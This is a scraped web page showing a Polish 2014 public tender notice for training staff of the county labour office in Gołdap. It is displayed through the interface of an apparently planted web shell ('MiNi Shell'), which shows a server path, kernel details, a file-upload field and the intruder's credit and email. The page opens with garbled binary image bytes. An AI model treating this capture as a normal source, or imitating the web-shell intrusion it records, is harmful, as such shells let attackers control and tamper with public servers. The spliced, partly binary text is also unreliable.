JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140204/22183-N-2014.html

<p class="kh_header"><b>Gołdap: Szkolenie pracowników Powiatowego Urzędu Pracy w Gołdapi</b><br>
<b>Numer ogłoszenia: 22183 - 2014; data zamieszczenia: 04.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Żeromskiego 18, 19-500 Gołdap, woj. warmińsko-mazurskie, tel. 087 6150395, faks 087 6150395.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie pracowników Powiatowego Urzędu Pracy w Gołdapi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu i przeprowadzeniu szkolenia grupowego dla pracowników Powiatowego Urzędu Pracy w Gołdapi nt. Nowelizacja ustawy o promocji zatrudnienia i instytucjach rynku pracy 2014. 
2. Przez nowelizację ustawy o promocji zatrudnienia i instytucjach rynku pracy 2014, należy rozumieć projekt zmian do ustawy o promocji zatrudnienia i instytucjach rynku pracy, która jest planowana do wprowadzenia w życie 2014 r.
2. Celem szkolenia ma być zapoznanie uczestników szkolenia z najnowszymi zmianami ustawy o promocji zatrudnienia i instytucjach rynku pracy i przepisów wykonawczych.
3. Szkolenie ma zostać przeprowadzone w formie kursu, o którym mowa w § 3 ust. 5 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych /Dz. U. z 2012 r. poz. 186, z późn. zm./.
4. Liczba osób objętych szkoleniem 27 pracowników Powiatowego Urzędu Pracy w Gołdapi. Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia grupy szkoleniowej, maksymalnie o 3 osoby. Najpóźniej, na 7 dni przed rozpoczęciem szkolenia Zamawiający poinformuje Wykonawcę o ostatecznej liczbie uczestników. W tej sytuacji wynagrodzenie należne wykonawcy zostanie obliczone na podstawie liczby faktycznie przeszkolonych osób pomnożonej przez koszt szkolenia jednej osoby wskazany w formularzu ofertowym.
5. Termin szkolenia 05 - 06 kwietnia 2014 r.
6. Harmonogram szkolenia przedstawia Załącznik Nr 3 do SIWZ.
7. Czas trwania szkolenia 2 dni - 12 godzin lekcyjnych.
8. Program szkolenia winien być opracowany w oparciu § 22 w/w rozporządzenia. W ramach szkolenia omówione zostaną co najmniej następujące zagadnienia
1/ nowe definicje ustawowe,
2/ profilowanie pomocy kierowanej do bezrobotnych z uwzględnieniem rodzajów usług,
3/ doradca klienta - nowe stanowisko ds. obsługi klienta indywidualnego
i instytucjonalnego,
4/ zmiany dotyczące zasad nabywania i utraty statusu bezrobotnego,
5/ zmiany dotyczące usług i instrumentów rynku pracy,
6/ nowe instrumenty rynku pracy,
7/ program PAI,
8/ uzależnienie środków na wynagrodzenia pracowników urzędów pracy od efektów i standardów działania urzędów pracy,
9/ Rady Rynku Pracy /skład, zadania/,
10/ przepisy przejściowe.
9. Miejsce szkolenia: Wykonawca zaproponuje w ofercie obiekt hotelowy położony poza terenem powiatu gołdapskiego, w odległości do 100 km od granic administracyjnych miasta Gołdap. Standard obiektu nie może być niższy niż dla hoteli zaszeregowanych do kategorii trzech gwiazdek zgodnie z ustawą z dnia 29 sierpnia 1997 r. o usługach turystycznych /Dz. U. z 2004 r. Nr 223, poz. 2268, z późn. zm./. 
Zaproponowany kompleks hotelowy musi być wyposażony w przestronną, oddzielną salę szkoleniową, restaurację, miejsca noclegowe zlokalizowane w jednym budynku oraz kręgielnię.
10. Sala szkoleniowa powinna być przygotowania tak, aby pomieścić przewidywaną liczbę uczestników i dostosowana pod względem wyposażenia do potrzeb przeprowadzenia zajęć, spełniająca następujące wymagania:
1/ sala szkoleniowa dla 27 uczestników /+ 3 osoby/, krzesła tapicerowane, stoliki ustawione /w podkowę/, stół dla prowadzącego,
2/ odpowiednie oświetlenie - naturalne i sztuczne, w przypadku sali o dużym naświetleniu słonecznym, okna powinny mieć możliwość zaciemnienia,
3/ temperatura powietrza nie może być niższa niż 21 stopni C,
4/ sprzęt multimedialny do prezentacji: rzutnik multimedialny, biały ekran /ściana/,
5/ tablica flipchart z kartkami i mazakami,
6/ dostęp do internetu,
7/ odpowiednia akustyka i klimatyzacja.
11. Nie dopuszcza się wykorzystania sali restauracyjnej, pokoi hotelowych oraz innych pomieszczeń nie przystosowanych do przeprowadzenia zajęć na szkoleniu.
12. Każdy uczestnik szkolenia otrzyma materiały szkoleniowe tematycznie związane z prezentowanym na zajęciach materiałem i materiały biurowe /długopis, notatnik/ oraz szczegółowy harmonogram szkolenia. Materiały muszą być przekazane na własność w dniu rozpoczęcia szkolenia.
13. Po zakończonym szkoleniu Wykonawca wyda wszystkim uczestnikom zaświadczenie o ukończeniu szkolenia zgodnie z załącznikiem nr 5 do rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych /Dz. U. z 2012 r. poz. 186,z późn. zm./.
14. Wykonawca zobowiązany jest do prowadzenia dokumentacji szkoleniowej zgodnie z wymaganiami określonymi w § 21 ust. 1 rozporządzenia.
15. Wykonawca zapewni zakwaterowanie w pokojach 1-osobowych i 2-osobowych /3 pokoje jednoosobowe  i 12 pokoi dwuosobowych/ - 1 nocleg .
16. Pokoje będą wyposażone w łazienki /prysznic, umywalka, WC, lustro/, jednoosobowe łóżka, szafę, biurko lub stół, krzesło lub inny mebel do siedzenia, telewizor, zestaw ręczników, mydło, zimna i ciepła woda dostępna całą dobę. Pokoje winny mieć dostęp do internetu i telefonu. Wykluczone są dostawki w pokojach. Temperatura powietrza w pokojach nie mniejsza niż 21 stopni C.
17. Wykonawca zobowiązany jest do udostępnienia pokoi hotelowych dla uczestników szkolenia zgodnie z zaprezentowanym harmonogramem lub pomieszczenia do złożenia bagaży przez uczestników w dniu przyjazdu przed rozpoczęciem szkolenia  i w dniu wyjazdu do zakończenia szkolenia.
18. Wykonawca zobowiązany jest zapewnić pełne wyżywienie każdemu uczestnikowi szkolenia.
Dzień I 
1/ Dwie przerwy kawowe, tj.  kawa, herbata, mleko do kawy, cukier, cytryna, woda, ciastka. Poczęstunek w ramach przerw kawowych ma być dostępny w sali wykładowej w czasie trwania szkolenia.
2/ Obiad bufetowy, w tym 2 zupy, 2 dania główne mięsne, ziemniaki w dwóch postaciach, zestaw surówek, napoje zimne /soki owocowe, woda mineralna/, kawa, herbata, deser. Produkty należy uzupełniać na bieżąco.
3/ Kolacja w formie bufetu, tj. danie główne podane na ciepło, pieczywo mieszane, sery, wędliny, masło, dżem, świeże warzywa, sałatki, kawa, herbata, soki owocowe, woda mineralna. Produkty należy uzupełniać na bieżąco.
Wszystkie składniki kolacji powinny być różne od składników obiadów podawanych podczas dwóch dni szkolenia.
Dzień II 
1/ Śniadanie formie bufetu, tj. pieczywo mieszane, sery, wędliny, masło, dżem, jogurty owocowe, świeże warzywa, sałatki, kawa, herbata, soki owocowe, woda mineralna, ciepły posiłek np. jajecznica, jajka sadzone, parówki lub kiełbaski itp. Produkty należy na bieżąco uzupełniać.
2/ Obiad bufetowy, w tym 2 zupy, 2 dania główne mięsne, ziemniaki w dwóch postaciach, zestaw surówek, napoje zimne /soki owocowe, woda mineralna/, kawa, herbata, deser. Produkty należy uzupełniać na bieżąco.
19. Wykonawca zorganizuje przewóz uczestników do miejsca realizacji szkolenia
i z powrotem. Wyjazd na szkolenie nastąpi w sobotę 05.04.2014 r. o godzinie 8:00 z parkingu przy Placu Zwycięstwa w Gołdapi, natomiast wyjazd ze szkolenia w niedzielę 06.04.2014 r. o godzinie 13:30. Przystanek końcowy to parking przy Placu Zwycięstwa w Gołdapi.
20. Wykonawca zapewni, że przewóz będzie odbywać się autobusem sprawnym technicznie, a usługa będzie świadczona przez wykwalifikowanego kierowcę, legitymującego się odpowiednimi uprawnieniami. Przewoźnik musi posiadać odpowiednie licencje na przewóz osób.
21. Wykonawca zobowiązany jest do ubezpieczania uczestników szkolenia od następstw nieszczęśliwych wypadków /NW/ na czas trwania szkolenia oraz przejazdu.
22. Szkolenie będzie finansowane w całości ze środków publicznych. 
23. Wykonawca zobowiązany będzie do przestrzegania w ramach umowy, ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych /Dz. U. z 2002 r. Nr 101, poz. 926, z późn. zm./.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca udokumentuje posiadanie wiedzy i doświadczenia poprzez wykonanie co najmniej 1 usługi szkoleniowej obejmującej zakres tematyczny przedmiotu zamówienia dla grupy co najmniej 20 osobowej, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował  co najmniej 1 osobą - trenerem będącym radcą prawnym lub doktorem prawa, posiadającym doświadczenie w postaci przeprowadzenia co najmniej 1 szkolenia o tematyce zgodnej z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ formularz ofertowy - załącznik nr 1 do SIWZ,
2/ program nauczania - załącznik nr 2 do SIWZ,
3/ pełnomocnictwo - jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie zawodowe trenera - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian w umowie, w szczególności w zakresie dotyczącym:
1/ zmiany ilości osób objętych szkoleniem,
2/ kadry dydaktycznej /np. rezygnacji itp. - pod warunkiem, iż nowy wykładowca trener będzie spełniał wymagania określone w SIWZ dla tego wykładowcy-trenera/,
3/ zmian w przepisach prawa wpływających na treść zawartej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.goldap.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gołdapi
ul. Żeromskiego 18 /pokój nr 11/
19-500 Gołdap.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2014 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Gołdapi, ul. Żeromskiego 18, I piętro, pokój nr 15 /sekretariat/, 19-500 Gołdap.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com